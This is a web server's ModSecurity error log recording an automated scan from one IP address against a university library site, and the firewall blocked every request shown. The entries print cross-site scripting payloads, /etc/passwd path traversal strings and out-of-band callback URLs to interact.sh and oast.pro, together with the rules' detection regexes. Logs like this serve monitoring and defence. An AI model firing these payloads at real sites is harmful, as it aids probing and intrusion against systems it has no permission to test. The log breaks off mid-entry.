[Tue Aug 29 11:51:21.630199 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:searchOwnerUserName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:searchOwnerUserName: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/secure/ConfigurePortalPages!default.jspa"] [unique_id "ZO15ScCo-f0AAAmHd@cAAAAz"]
[Tue Aug 29 11:51:22.891112 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:filtervalue. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:filtervalue: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/Portal/Portal.mwsl"] [unique_id "ZO15SsCo-f0AAAnIlgIAAAAV"]
[Tue Aug 29 11:51:22.919244 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO15SsCo-f0AAAkyyEoAAAAW"]
[Tue Aug 29 11:51:23.033676 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/api/sso/v2/sso/jwt"] [unique_id "ZO15S8Co-f0AAAnB5VEAAAAJ"]
[Tue Aug 29 11:51:23.567952 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:err: --><script>alert('2Ue0IThdcrNit2de4iq3Tr8D1X0')</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/remote/login"] [unique_id "ZO15S8Co-f0AAAmQ-xAAAAAb"]
[Tue Aug 29 11:51:23.796807 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:viewSurveyError. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:viewSurveyError: Unknown survey\\x22><img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/Main/Default.aspx"] [unique_id "ZO15S8Co-f0AAAknEOwAAAAB"]
[Tue Aug 29 11:51:24.966606 2023] [:error] [pid 2352] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php"] [unique_id "ZO15TMCo-f0AAAkwQXYAAAAS"]
[Tue Aug 29 11:51:25.014638 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15TcCo-f0AAAjdQUgAAAAZ"]
[Tue Aug 29 11:51:26.779678 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:MESSAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:MESSAGE: MESSAGE</textarea></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/activehelper-livehelp/server/offline.php"] [unique_id "ZO15TsCo-f0AAAnGkIgAAAAR"]
[Tue Aug 29 11:51:26.779735 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:shortcode_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:shortcode_id: 1\\x22 onmouseover=alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15TsCo-f0AAAm80PEAAAAF"]
[Tue Aug 29 11:51:26.887482 2023] [:error] [pid 2499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/php/telnet_form.php"] [unique_id "ZO15TsCo-f0AAAnDFy0AAAAM"]
[Tue Aug 29 11:51:26.887880 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:type: \\x22</script><script>alert(document.domain);</script><script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/log"] [unique_id "ZO15TsCo-f0AAAkr0GEAAAAC"]
[Tue Aug 29 11:51:27.627844 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');\\x22> found within ARGS:uid: \\x22><img src=\\x22x\\x22 onerror=\\x22alert('XSS');\\x22>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/login/"] [unique_id "ZO15T8Co-f0AAAm7m@4AAAAE"]
[Tue Aug 29 11:51:28.920139 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /)</ found within ARGS:section: \\x22><h1>hello</h1><script>alert(/2Ue0IR2M1XBxYBON8r2blbSH9hk/)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/manlist"] [unique_id "ZO15UMCo-f0AAAnB5V0AAAAJ"]
[Tue Aug 29 11:51:28.921597 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:galleryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:galleryId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/tidio-gallery/popup-insert-help.php"] [unique_id "ZO15UMCo-f0AAAmLPTcAAAAN"]
[Tue Aug 29 11:51:28.925027 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:advSearch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22></ found within ARGS:advSearch: 0'\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15UMCo-f0AAAnIlhQAAAAV"]
[Tue Aug 29 11:51:29.550626 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:username: '\\x22><script>javascript:alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/timesheet/login.php"] [unique_id "ZO15UcCo-f0AAAmQ-yIAAAAb"]
[Tue Aug 29 11:51:30.561453 2023] [:error] [pid 2499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:usr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:usr: admin'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15UsCo-f0AAAnDFzYAAAAM"]
[Tue Aug 29 11:51:30.561706 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:routineName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:routineName: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/jsps/genrequest.jsp"] [unique_id "ZO15UsCo-f0AAAkyyGAAAAAW"]
[Tue Aug 29 11:51:30.725230 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:callback: </script><img/src/onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15UsCo-f0AAAlUljoAAAA0"]
[Tue Aug 29 11:51:31.547424 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.pro\\x22><img src=x onerror=alert(document.domain)> found within TX:1: oast.pro\\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/cas/logout"] [unique_id "ZO15U8Co-f0AAAmNp5wAAAAQ"]
[Tue Aug 29 11:51:31.604978 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Display_FAQ. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:Display_FAQ: </script><svg/onload=alert(document.cookie)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO15U8Co-f0AAAkyyGQAAAAW"]
[Tue Aug 29 11:51:34.800737 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:action: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO15VsCo-f0AAAnd29kAAAAI"]
[Tue Aug 29 11:51:34.868660 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:id: \\x22><script>alert('2Ue0HEhxUkrmNh9pZggHjrmQ3SN')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/jira/secure/BrowseProject.jspa"] [unique_id "ZO15VsCo-f0AAAnB5WsAAAAJ"]
[Tue Aug 29 11:51:34.908967 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:orderby. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:orderby: title\\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wpdmpro/list-packages/"] [unique_id "ZO15VsCo-f0AAAnB5W0AAAAJ"]
[Tue Aug 29 11:51:34.928920 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15VsCo-f0AAAnf3kYAAAAM"]
[Tue Aug 29 11:51:35.046696 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/webEdition/showTempFile.php"] [unique_id "ZO15V8Co-f0AAAnepMUAAAAK"]
[Tue Aug 29 11:51:35.540532 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAmQ-z8AAAAb"]
[Tue Aug 29 11:51:39.537620 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/updating.jsp"] [unique_id "ZO15W8Co-f0AAAmQ-0cAAAAb"]
[Tue Aug 29 11:51:40.918475 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:darkmode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:darkmode: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/bbs/new.php"] [unique_id "ZO15XMCo-f0AAAnkwb4AAAAY"]
[Tue Aug 29 11:51:42.533277 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fileList[0][title]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fileList[0][title]: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] 